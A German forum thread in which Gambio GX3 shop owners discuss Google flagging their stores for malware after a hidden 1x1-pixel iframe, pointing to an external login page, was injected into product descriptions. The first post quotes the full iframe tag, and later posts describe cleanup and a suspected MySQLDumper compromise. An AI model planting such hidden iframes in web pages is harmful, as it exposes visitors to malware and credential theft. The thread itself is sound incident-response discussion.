Malware im GX3

Thema wurde von haralddwenger, 28. Dezember 2017 erstellt.

  1. haralddwenger

    haralddwenger Aktives Mitglied

    Registriert seit:
    15. März 2015
    Beiträge:
    27
    Danke erhalten:
    3
    Danke vergeben:
    16
    #1 haralddwenger, 28. Dezember 2017
    Zuletzt bearbeitet: 28. Dezember 2017
    Moin,

    Google hat heute morgen meinen Shop blockiert "

    Malware auf nachfolgender Website
    Zurzeit auf vinsole.de befindliche Hacker könnten versuchen, gefährliche Programme auf Ihrem Computer zu installieren, um Daten wie Fotos, Passwörter, Nachrichten und Kreditkartendaten zu stehlen oder zu löschen. Weitere Informationen"

    Ich habe festgestellt, das sich in jeden meiner Artikelbeschreibungen jetzt ein Iframe befindet, welches auf eine andere Seite verlinkt:

    <iframe src="https://www.dataservices.download/login2.html" style="border:0px #ffffff none;" name="footer" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px" allowfullscreen></iframe>

    Scheint irgendwo ein Leck in Gambio zu sein, oder?

    Gruß
    Harald
    (Kopie an Gambio-Support)
     
  2. Wilken (Gambio)

    Wilken (Gambio) Erfahrener Benutzer

    Registriert seit:
    7. November 2012
    Beiträge:
    18.737
    Danke erhalten:
    7.310
    Danke vergeben:
    2.208
    DIe URL ist mir unbekannt, das ist kein Code von uns. Das sieht auch wirklich nicht aus, als sollte das da sein, ich würde auch erstmal einen Hack deines Shops für annehmbar halten. Wir sehen uns das jetzt an, und werden versuchen da zu einer Einschätzung zu gelangen.
     
  3. haralddwenger

    haralddwenger Aktives Mitglied

    Registriert seit:
    15. März 2015
    Beiträge:
    27
    Danke erhalten:
    3
    Danke vergeben:
    16
    Ich habe inzwischen in der Datenbank alle Links in den Artikelbeschreibungen gelöscht.

    Die Frage ist nun, wo steckt das "Iframe" und wie lösche ich es?

    Wilken: ist schon klar, das das nicht von euch ist :)
     
  4. Wilken (Gambio)

    Wilken (Gambio) Erfahrener Benutzer

    Registriert seit:
    7. November 2012
    Beiträge:
    18.737
    Danke erhalten:
    7.310
    Danke vergeben:
    2.208
    Wir haben eine Erklärung für das Problem gefunden, sie liegt ausserhalb des Shops. Ticketantwort geht in Kürze zu. Du kannst dann selbst entscheiden, ob du den Problemkreis öffentlich diskutieren magst, das wäre hier grundsätzlich vielleicht nicht schlecht.
     
  5. FlorianR

    FlorianR Erfahrener Benutzer

    Registriert seit:
    20. November 2015
    Beiträge:
    1.400
    Danke erhalten:
    268
    Danke vergeben:
    1.041
    Hallo, habe exakt das gleiche Problem. Auch mein Shop wird von Google als Malwarschleuder klassifiziert. Bei mir versteckt sich in Artikelbeschreibungen der gleiche iframe wie oben beschrieben.

    Vermute, dass das durch eine Hack auf meine mySQLDumper Installation gekommen ist.

    Der mySQLDumper Ordner ist inzwischen mit htpassword und htaccess gesichert. Langt es nun, wenn ich in der DB überall diesen iFrame rauslösche oder wird der von einem verseuchten Javascript immer wieder neu eingebaut? Wie kann ich das eventuell infizierte Javascript finden?
     
  6. haralddwenger

    haralddwenger Aktives Mitglied

    Registriert seit:
    15. März 2015
    Beiträge:
    27
    Danke erhalten:
    3
    Danke vergeben:
    16
    Hallo Florian,

    ich habe in der products_description in allen Artikeln das iframe gelöscht. Die Datenbank ist wieder sauber,
    ein javascript habe ich nicht gefunden.

    Gruß Harald
     
  7. Charly

    Charly Erfahrener Benutzer

    Registriert seit:
    27. Februar 2013
    Beiträge:
    95
    Danke erhalten:
    1
    Danke vergeben:
    4
    Hallo,

    auch ich habe die Malwarewarnung von Google bei 2 Shops erhalten. Allerdings kann ich keine auffällige IFrames oder anderes feststellen. Auch ein Malwarescan über verschiedene Angebote konnte nichts finden.

    MySQLDumper (htaccess-geschützt) nutze ich ebenfalls, den nutze ich aber auch bei anderen Shopsystemen wo das Problem noch nicht aufgetaucht ist.

    Bei der Warnung werden Anzeigen, also Anzeigetext, Keywords, Beschreibung und Links zur jeweiligen Seite aufgelistet, aber nicht genau mitgeteilt was da wirklich das Problem ist.

    Problembeschreibung:
    Anzeigenstatus: Abgelehnt
    Probleme mit der Anzeige: Malware und unerwünschte Software
     
  8. Dennis (MotivMonster.de)

    Dennis (MotivMonster.de) G-WARD 2013/14/15/16

    Registriert seit:
    22. September 2011
    Beiträge:
    31.167
    Danke erhalten:
    6.199
    Danke vergeben:
    1.104
    Beruf:
    Mann für alles :)
    Ort:
    Weilburg
    welche Seite wird da angemahnt? tickt aufmachen